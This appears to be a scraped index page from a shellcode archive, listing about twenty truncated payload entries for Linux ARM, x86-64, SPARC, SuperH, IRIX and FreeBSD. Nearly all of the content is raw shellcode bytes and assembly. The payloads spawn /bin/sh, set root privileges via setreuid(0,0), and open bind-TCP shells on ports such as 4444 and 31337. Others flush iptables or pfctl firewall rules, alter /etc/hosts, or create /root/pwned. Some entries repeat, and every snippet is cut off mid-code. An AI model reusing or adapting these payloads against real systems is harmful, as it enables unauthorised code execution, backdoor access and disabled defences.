Linux/StrongARM - execve (/bin/sh) Shellcode (47 bytes)
/ 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / str r2, sp, 8 / "\x13\x02\xa0\xe1" / mov r0, r3, lsl r2 / "\x07\x20\xc3\xe5" / strb r2, r...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
/ global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push rbx push rsp pop rdi xor rsi,rsi mov sil,4 sal rsi,8 mov sil,1 syscall ;write push rax pop rdi push 1 pop rax jmp data...
Linux/x86-64 - execve (/sbin/iptables, [/sbin/iptables, -F], NULL) Shellcode (43 bytes)
/ section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f push rbx push rsp pop rdi push rdx push rcx push rdi push rsp pop rsi ; execve"/sbin/iptables", "/sbin/iptables", "-F",...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
/ global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; // cha...
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
/ Execute /bin/sh - 27 bytes Dad 0x7ffff7aeff20 : mov eax,0x3b ; 0x7ffff7aeff25 : syscall ; main: ;mov rbx, 0x68732f6e69622f2f ;mov rbx, 0x68732f6e69622fff ;shr rbx, 0x8 ;mov rax, 0xdeadbeefcafe1dea ;mov rbx, 0xdeadbeefcafe1dea ;mov rcx, 0xdeadbeefcafe1dea ;mov rdx, 0xdeadbeefcafe1dea xor eax, ea...
IRIX - stdin-read Shellcode (40 bytes)
/ 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso / unsigned long int shellcode = 0x24048cb0, / li $a0, -0x7350 / / dpatch: / 0x0490ffff, / bltzal $a0, dpatch / 0x2804ffff, / slti $a0, $zero, -1 / 0x240fffe3, / li $t7, -29 / 0x01e07827, / nor $t7, $t7, $zero / 0x03ef2821, / addu $a1, $ra,...
Linux/ARM - execve (/bin/sh,NULL,0) Shellcode (31 bytes)
/ Title: Linux/ARM - execve"/bin/sh",NULL,0 - 31 bytes Date: 2010-08-31 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM without 0x20, 0x0a and 0x00 00008054 : 8054: e28f3001 add r3, pc, 1 ; 0x1 8058: e12fff13 bx r3 805c: 4678 mov r0, p...
Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)
/ Title: Add map in /etc/hosts file - 79 bytes Date: 2015-03-02 Architecture: armv6l GNU/Linux Website: http://osandamalith.wordpress.com E-Mail: osandacatunseen.is Author: Osanda Malith Jayathissa @OsandaMalith hosts: file format elf32-littlearm Disassembly of section .text: 00008054 : 8054:...
Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)
/ Bind /bin/sh on port 31337 SH4 - 132bytes main: mov 102,r3 mov 2,r4 mov 1,r5 xor r6,r6 mov.l r6,@-r15 mov.l r5,@-r15 mov.l r4,@-r15 mov 1,r4 mov r15,r5 trapa 19 mov r0,r4 mov r0,r8 xor r2,r2 mov.l r2,@-r15 mov 105,r2 mov.b r2,@-r15 mov 122,r2 mov.b r2,@-r15 xor r2,r2 mov.b r2,@-r15 mov 2,r2 mov...
Linux/SPARC - setreuid(0,0) + execve(/bin/sh) Shellcode (64 bytes)
/ Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta 0x10 / / execve of /bin/sh / "\x2d\x0b\xd8\x9a" / sethi...
IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)
/ 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso / unsigned long int shellcode = 0x2416fffd, / li $s6, -3 / 0x02c07027, / nor $t6, $s6, $zero / 0x01ce2025, / or $a0, $t6, $t6 / 0x01ce2825, / or $a1, $t6, $t6 / 0x240efff9, / li $t6, -7 / 0x01c03027, / nor $a2, $t6, $zero /...
Linux/SPARC - setreuid(0,0) + standard execve() Shellcode (72 bytes)
/ Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...
Linux/SuperH (sh4) - execve(/bin/sh, 0, 0) Shellcode (19 bytes)
/ | Title: Linux/SuperH - sh4 execve"/bin/sh", 0, 0 - 19 bytes | Date: 2011-06-22 | Tested on: Debian-sh4 2.6.32-5-sh7751r | Author: Florian Gaultier - agix - twitter: @Agixid | | http://shell-storm.org / include include int main char shell = "\x0b\xe3"// mov 11,r3 "\x02\xc7"// mova @10,pc,r0...
Linux/ARM - creat(/root/pwned, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - creat"/root/pwned", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...
FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)
/ Gitsnik, @dracyrys FreeBSD x8664 bindtcp with passcode, 127 bytes Passcode: R2CBw0cr / C Source: char code = \ "\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99" "\x0f\x05\x48\x97\xba\xff\x02\xaa\xaa\x80" "\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80" "\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e"...
Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)
Linux/ARM Raspberry Pi - Bind TCP 0.0.0.0:4444/TCP Shell /bin/sh + Null-Free Shellcode 112 bytes. Shellcode exploit for ARM platform .section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mo...
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...
FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)
/ Title: FreeBSD 8.0-RELEASE/x86 '//sbin/pfctl -F all Shellcode 47 Bytes' Type: Shellcode Author: antrhacks Platform: FreeBSD 8.0-RELEASE / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2d 46 61 6c push $0x6c61462d 89 e1 mov %esp,%ecx 50 push %eax 68 66 63 74 6c push $0x6c746366 68 69 6e 2f 70...
FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)
/ Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05"; Intel Assembly: global start ; ; 28 byte execve FreeBSD x8664 ; ; gitsnik@bsd64$ nasm -f elf64...